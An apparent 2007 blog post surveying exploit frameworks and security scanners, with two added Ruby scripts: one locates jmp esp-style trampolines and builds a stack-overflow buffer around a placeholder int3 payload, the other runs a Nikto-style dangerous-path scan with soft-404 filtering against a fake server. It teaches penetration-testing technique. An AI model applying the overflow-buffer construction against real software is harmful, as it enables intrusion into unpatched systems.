Thursday, December 06, 2007

Exploit development frameworks and platforms - Metasploit, MSF-XB


The Metasploit Project is an open source computer security project that aids penetration testing and IDS signature development and provides information on security vulnerabilities.


  • The Metasploit Framework is a development platform for creating security tools and exploits. It is used by network security professionals to perform penetration tests, by system administrators to verify patch installations, by product vendors for regression testing, and by security researchers worldwide. The framework is written in Ruby (version 3.0 was a rewrite of the earlier Perl code base) and includes components written in C and assembly. It consists of tools, libraries, modules, and user interfaces. Its basic function is that of a module launcher: the user selects an exploit module, sets its options (target host and port, target version, payload) and launches it against a target system. If the exploit succeeds, the payload is executed on the target and the user is given a session (for example a shell) through which to interact with it.
  • The Shellcode Archive contains payloads written by the Metasploit staff and includes a Windows shellcode development kit.
  • The Opcode Database records the addresses of useful machine-code sequences (for example jmp esp or call esp) in the Windows executables and system DLLs of specific OS and service-pack versions, so that an exploit can overwrite a saved return address with one of them instead of guessing a stack address.
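
The two bullets above describe what an exploit module actually does with an Opcode Database entry: find a trampoline such as jmp esp at a fixed address, make sure that address survives the vulnerable parser, and place it over the saved return address with the payload behind it. The following Ruby script is an added example, not Metasploit's or findjmp2's own code: it scans a mapped image for the common ESP trampolines the way findjmp2 (bundled with MSF-XB) does, filters them against a bad-character set, and assembles the classic overflow buffer. The image bytes, the image base 0x7c800000, the bad characters and the eight-byte int3 payload are all constructed for the example.

```ruby
# Added example (not Metasploit's or findjmp2's own code): locate "jmp esp"-style
# opcode sequences in a mapped image, the way the Opcode Database and findjmp2 do,
# filter them against the parser's bad characters, and build the overflow buffer
# around one of them the way an exploit module does. The image bytes, the image
# base 0x7c800000, the bad-character set and the 8-byte payload are all
# constructed for this example.

# Opcode sequences that transfer control to the address held in ESP. When the
# saved return address is overwritten with the address of one of these, the
# return lands in the attacker-controlled bytes that follow on the stack.
TRAMPOLINES = {
  "jmp esp"       => "\xFF\xE4".b,
  "call esp"      => "\xFF\xD4".b,
  "push esp; ret" => "\x54\xC3".b,
  "jmp [esp]"     => "\xFF\x24\x24".b,
}.freeze

# Every occurrence of a trampoline in +image+, assuming it is mapped at +base+.
def find_trampolines(image, base)
  hits = []
  TRAMPOLINES.each do |name, seq|
    pos = image.index(seq)
    while pos
      hits << { name: name, offset: pos, address: base + pos }
      pos = image.index(seq, pos + 1)
    end
  end
  hits.sort_by { |h| h[:offset] }
end

# A return address is only usable if none of its four little-endian bytes is a
# character the vulnerable parser will drop, translate or treat as a terminator.
def address_usable?(address, badchars)
  [address].pack("V").bytes.none? { |b| badchars.include?(b) }
end

def usable_trampolines(image, base, badchars)
  find_trampolines(image, base).select { |h| address_usable?(h[:address], badchars) }
end

# The classic stack-overflow layout:
#   padding to the saved return address | trampoline address | NOP sled | payload
# Bad characters in the address or payload are rejected here rather than
# silently producing a buffer that will be mangled in transit.
def build_overflow_buffer(offset, ret_address, payload, badchars, nops: 16)
  unless address_usable?(ret_address, badchars)
    raise ArgumentError, format("return address 0x%08x contains a bad character", ret_address)
  end
  bad = payload.bytes.select { |b| badchars.include?(b) }.uniq
  unless bad.empty?
    raise ArgumentError, "payload contains bad characters: " + bad.map { |b| format("0x%02x", b) }.join(" ")
  end
  ("A" * offset).b + [ret_address].pack("V") + ("\x90" * nops).b + payload.b
end

# Constructed image: NUL filler with three trampolines planted at chosen offsets.
# Two of them land on addresses containing 0x00 or 0x0a and must be rejected.
SAMPLE_IMAGE = [
  "\x00" * 0x100,  "\xFF\xE4",   # jmp esp       at 0x0100 -> 0x7c800100 (contains 0x00)
  "\x00" * 0x108,  "\xFF\xD4",   # call esp      at 0x020a -> 0x7c80020a (contains 0x0a)
  "\x00" * 0x1902, "\x54\xC3",   # push esp; ret at 0x1b0e -> 0x7c801b0e (clean)
  "\x00" * 0x10,
].map(&:b).join
SAMPLE_BASE = 0x7c800000
BADCHARS    = [0x00, 0x0a, 0x0d].freeze
# Stand-in for real shellcode: eight int3 instructions, which is what you would
# send first to confirm under a debugger that the trampoline is reached.
SAMPLE_PAYLOAD = ("\xCC" * 8).b

if __FILE__ == $PROGRAM_NAME
  find_trampolines(SAMPLE_IMAGE, SAMPLE_BASE).each do |h|
    verdict = address_usable?(h[:address], BADCHARS) ? "usable" : "bad chars"
    printf("%-14s offset 0x%04x -> 0x%08x  %s\n", h[:name], h[:offset], h[:address], verdict)
  end
  ret = usable_trampolines(SAMPLE_IMAGE, SAMPLE_BASE, BADCHARS).first[:address]
  buf = build_overflow_buffer(260, ret, SAMPLE_PAYLOAD, BADCHARS)
  puts "buffer: #{buf.bytesize} bytes, return address #{buf[260, 4].unpack1('H*')}"
end
```

Only the third trampoline survives the bad-character filter: the jmp esp at 0x7c800100 contains a NUL and the call esp at 0x7c80020a contains a line feed, both of which a typical string parser would cut short. That filtering step is the part of the process the Opcode Database entry alone does not do for you.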

MSF-eXploit Builder

  • MSF-eXploit Builder (MSF-XB) is a free Windows GUI and exploit development platform for Metasploit Framework exploit modules. It helps you edit, modify, create and test exploit modules for the Metasploit Framework. It also bundles an assortment of fuzzers (TAOF, ProxyFuzz, FileFuzz, WinFuzz) and various other tools (Branchseeker, Faultmon, mycrc, nc, Findjmp2 and even PsTools). It requires an installed Metasploit Framework and a debugger (Immunity Debugger is a good choice).

SecurityForest Exploitation Framework:

  • SecurityForest's Exploitation Framework is similar in concept to Metasploit and is written in Perl. The major difference is that it leverages the large number of exploits available in the ExploitTree. These exploits are publicly available and do not have to be rewritten to be used in the framework, whatever language they are written in and, in many cases, whatever OS they target. It essentially acts as a graphical user interface to the ExploitTree and is updated dynamically together with it.

E-mail exploitation frameworks:

  • PIRANA is an exploitation framework that tests the security of an e-mail content filter. Driven by a vulnerability database, it bombards the content filter under test with e-mails carrying malicious payloads designed to compromise the filtering platform itself. PIRANA's goal is to determine whether any of those vulnerabilities exist on the content-filtering platform. It uses the shellcode generator from the Metasploit Framework.

Browser Exploitation Framework:
  • BeEF is the Browser Exploitation Framework, used to demonstrate the real-time impact of XSS vulnerabilities: a browser that loads BeEF's JavaScript hook through an XSS flaw becomes a hooked browser that the tester can issue commands to from the BeEF console.

Web server scanner:
  • Nikto is an open source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, version detection for over 900 server types, and version-specific problems on over 250 servers. Scan items and plugins are frequently updated and can be updated automatically if desired.
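
A dangerous-file scan of the kind Nikto performs is only as good as its handling of servers that answer 200 for every path with a friendly "not found" page, since on such a server every one of the 3500 probes looks like a hit. The Ruby script below is an added example, not Nikto's own code: it requests a path that cannot exist first, remembers what "not found" looks like, and discards later 200s that match it. The path list and the in-process fake server are constructed for the example; the fetcher that uses Net::HTTP is a real one but is not exercised by the offline demo.

```ruby
require "securerandom"
require "digest"
require "net/http"

# Added example (not Nikto's own code): the core of a Nikto-style dangerous-file
# scan with the check that keeps it honest. Some servers answer 200 with a
# friendly "not found" page for every path, which would make every probe look
# like a hit; requesting a path that cannot exist first and remembering what
# "not found" looks like lets the scan discard those. The path list and the
# in-process fake server below are constructed for this example.

DANGEROUS_PATHS = %w[
  /cgi-bin/test-cgi /cgi-bin/php.cgi /.htaccess /server-status
  /phpinfo.php /admin/ /backup.tar.gz
].freeze

# Soft-404 pages usually echo the requested path, so it is removed before hashing.
def body_fingerprint(body, path)
  Digest::SHA256.hexdigest(body.to_s.gsub(path, ""))
end

# Ask for a random path. A 404 means the server is honest (nil fingerprint);
# a 200 means every other 200 must be compared against this body.
def soft_404_fingerprint(fetch)
  probe = "/#{SecureRandom.hex(12)}.html"
  status, body = fetch.call(probe)
  status == 200 ? body_fingerprint(body, probe) : nil
end

# +fetch+ is any callable taking a path and returning [status, body].
# Returns the paths that answered 200 with a body that is not the soft-404 page.
def scan(paths, fetch, baseline: true)
  not_found = baseline ? soft_404_fingerprint(fetch) : nil
  paths.select do |path|
    status, body = fetch.call(path)
    status == 200 && (not_found.nil? || body_fingerprint(body, path) != not_found)
  end
end

# Real fetcher over HTTP (not exercised by the demo, which stays offline).
def http_fetcher(host, port = 80)
  lambda do |path|
    Net::HTTP.start(host, port) do |http|
      response = http.get(path)
      [response.code.to_i, response.body.to_s]
    end
  end
end

# Constructed fake server: real content for two paths, 403 for one, and a
# "not found" page that still carries status 200 for everything else.
SOFT_404_SERVER = lambda do |path|
  case path
  when "/server-status" then [200, "<h1>Apache Server Status for example.test</h1>"]
  when "/phpinfo.php"   then [200, "<title>phpinfo()</title>"]
  when "/.htaccess"     then [403, "Forbidden"]
  else                       [200, "<html><body>Sorry, #{path} could not be found.</body></html>"]
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "without baseline: #{scan(DANGEROUS_PATHS, SOFT_404_SERVER, baseline: false).inspect}"
  puts "with baseline:    #{scan(DANGEROUS_PATHS, SOFT_404_SERVER).inspect}"
end
```

Against the fake server, the scan without the baseline reports six of the seven paths; with it, only /server-status and /phpinfo.php remain, which is the difference between a report a client can act on and one they will ignore.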

Network Vulnerability Scanners

  • Nessus is a comprehensive vulnerability scanner. Its goal is to detect potential or confirmed weaknesses on the machines it tests.
  • FwTest is a firewall testing tool.

Online vulnerability databases:
  • Secunia provides security advisories and information about patches, and provides software for vulnerability management.
  • Milw0rm is an exploit archive organized by exploit type (remote, local, web applications, denial of service) that also hosts shellcode and papers.